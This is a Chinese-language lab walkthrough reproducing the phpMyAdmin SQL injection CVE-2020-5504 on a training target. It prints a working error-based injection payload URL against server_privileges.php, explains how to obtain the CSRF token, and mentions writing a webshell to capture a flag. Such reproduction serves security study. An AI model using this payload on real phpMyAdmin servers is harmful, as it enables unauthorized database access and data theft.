phpmyadmin SQL注入 (CVE-2020-5504)

  • phpmyadmin SQL注入 (CVE-2020-5504)
    • 0x01 漏洞描述
    • 0x02 影响范围
    • 0x03 漏洞复现
      • 漏洞利用
    • 0x04 漏洞修复

所有文章,仅供安全研究与学习之用,后果自负!

phpmyadmin SQL注入 (CVE-2020-5504)

0x01 漏洞描述

phpMyAdmin是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。 路径:/pma/index.php 密码root:123456

0x02 影响范围

Phpmyadmin <= 5.00

Phpmyadmin <= 4.94

0x03 漏洞复现

(1) 根据提示访问靶场

http://vulfocus.fofa.so:46629/pma/index.php
root 123456登录


可以发现很多信息
phpmyadmin 版本为 5.0.0 刚好存在漏洞

漏洞利用

payload

/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))--+db=&token=7233732445545a2c2471503b3d287d62&viewing_mode=server

注意一下两点
(1)payload 中的token 从后台页面 ctrl+u 搜索token 找到
或者抓包 直接从请求包中找到
(2)由于该靶场根目录 在phpmyadmin 项目目录 /pma 目录上一级

所以访问
http://vulfocus.fofa.so:51039/pma 目录下 +payload

不能为
http://vulfocus.fofa.so:51039/pma/index.php +payload
会执行失败报错

访问

 http://vulfocus.fofa.so:51039/pma/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))--+db=&token=7233732445545a2c2471503b3d287d62&viewing_mode=server

报错注入执行成功

登入后台才能执行 sql报错注入, 不知道有什么用。
明明都可以直接执行sql语句啦。。。。

由于在线靶场 目的是获取flag
所以 用 phpmyadmin写马获取flag

参考另一篇文章 phpmyadmin getshe

0x04 漏洞修复

升级至最新版本

phpmyadmin SQL注入 (CVE-2020-5504) 复现相关推荐

  1. phpcms set inc.php,phpcms V9 sql注入漏洞测试

    phpcms V9 版本存在SQL注入漏洞,漏洞复现如下 0x00 以GET方式访问如下链接,得到返回包里mvbpqw_siteid值: http://127.0.0.1/index.php?m=wa ...

  2. i春秋2020新春公益赛 GYCTF有关SQL注入题复现

    0x00 前言 最近这段时间参加过一些CTF在线竞赛,做过一些Web题,发现SQL注入漏洞出现的频率可真高!不过在做题中也get到了一些Web新知识,现在通过题目复现的方式总结一下. 0x01 bla ...

  3. 泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现

    漏洞描述 泛微e-cology OA系统的WorkflowCenterTreeData接口在使用oracle数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞 影响范围 使用oracle数 ...

  4. Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)漏洞复现

    Drupal < 7.32 "Drupalgeddon" SQL注入漏洞 by ADummy 0x00利用路线 ​ Burpsuite抓包改包->信息被爆出 0x01漏 ...

  5. 本地搭建靶站进行漏洞复现和防御(SQL注入、文件上传、XSS漏洞的多种形式)

    目录 注册登录模块 源码 测试 源码加固 文件上传模块 源码 测试 源码加固 发布动态模块 源码 测试 源码加固 本地搭建靶站进行测试,旨在提高自己的开发能力以及对漏洞的理解. 源码:利用PHP开发具 ...

  6. kkcms前台sql注入漏洞复现

    kkcms前台sql注入漏洞复现 目录 安装kkcms 漏洞复现 安装kkcms 下载kkcms地址: https://github.com/https://github.com/ 浏览器访问主机ip ...

  7. 关于espcms的sql注入漏洞代码审计复现

    最近在看Seay大大的代码审计一书,边看边做一些代码审计的复现. 在讲代码审计思路时,大大用espcms举例挖掘了个sql注入漏洞,现在准备复现一下. 此案例主要是根据关键字回溯,然后得到漏洞. 使用 ...

  8. espcms5.7.13 sql注入漏洞复现

    espcms5.7.13 sql注入漏洞复现 作者: admin 时间: 2021-06-28 分类: 漏洞复现 使用代码审计工具自动审计,找到select语句,双击进入/adminsoft/cont ...

  9. 宏景eHR SQL注入漏洞复现(CNVD-2023-08743)

    0x01 产品简介 宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化.协同化.流程化.战略化需求的软件. 0x02 漏洞概述 宏景eHR 存在SQL注入漏洞,未经过身份认证的 ...

最新文章

  1. CUDA Samples: Calculate Histogram(atomicAdd)
  2. java 反射机制_Java反射机制原理探究
  3. audio 小程序 放大_码code | 小程序新能力释放,人人都能拥有对话机器人
  4. ERROR 1044 (42000): Access denied for user ''@'localhost' to database
  5. where in的sql语句按照指定ID进行排序的解决方法
  6. JSP 中的几种注释
  7. 【redis】在spring boot2.0中使用redis的StringRedisTemplate 自动注入@Autowired
  8. python init文件_Python __init__.py 作用详解
  9. 海量数据库解决方案2011040701
  10. 传染病SIR模型及蒙特卡洛方法
  11. 蓝牙配对连接HCI log学习
  12. python Shapely使用指南详解
  13. 睡眠 应该用 a加权 c加权_CPA每日一练财管加权平均资本成本的计算
  14. Pytest测试用例之setup与teardown方法(一)
  15. python 坐标轴单位标注_matlab坐标轴如何带单位标注?
  16. Attention注意力机制–原理与应用
  17. 数据库连接池之自定义连接池(mysql)
  18. 百度人脸识别测试环境配置教程
  19. window编译7z
  20. 电信物联网开放平台NB-IoT商业项目已投产

热门文章

  1. redis:non null hash key required
  2. 利用docker 搭建File Browser 文件管理系统
  3. 电子设计比赛暑期实践报告
  4. 平面设计新手需要注意哪些误区
  5. 深入了解PostgreSQL日志
  6. DOM(document Object model)
  7. 开学季!美斯坦福提醒各位新生:警惕来自自考成教的忽悠!
  8. 关于可选链操作符(?.)
  9. Linux服务器记录并查询历史操作记录
  10. (转)页游安全攻与防,SWF加密和隐藏密匙